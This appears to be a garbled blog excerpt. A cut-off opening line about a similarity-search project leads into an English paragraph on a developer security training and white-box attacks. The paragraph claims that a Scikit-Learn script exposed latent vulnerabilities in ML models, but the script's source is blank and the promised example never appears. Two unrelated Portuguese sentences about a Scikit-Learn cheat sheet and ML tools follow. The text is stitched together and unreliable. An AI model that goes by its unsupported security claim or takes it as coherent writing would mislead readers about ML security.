Source: just a similarity from Rojs Rozentāls Some time ago I was working in a project of similarity search (i.e.
Some weeks ago during a security training for developers provided by Marcus from Hackmanit (by the way, it’s a very good course that goes in some topics since web development until vulnerabilities of NoSQL and some defensive coding) we discussed about some white box attacks in web applications (e.g.attacks where the offender has internal access in the object) I got a bit curious to check if there’s some similar vulnerabilities in ML models. After running a simple script based in ,, using Scikit-Learn, I noticed there’s some latent vulnerabilities not only in terms of objects but also in regarding to have a proper security mindset when we’re developing ML models. But first let’s check a simple example.
Para quem tem dificuldade com a sintaxe do Scikit-Learn, o pessoal da Datacamp fez um cheat sheet definitivo com todas as principais construções sintáticas da API.
Quando falamos de ferramentas de machine learning logo vem a cabeça a tríade Tensor Flow, Scikit-Learn e Spark MLLib.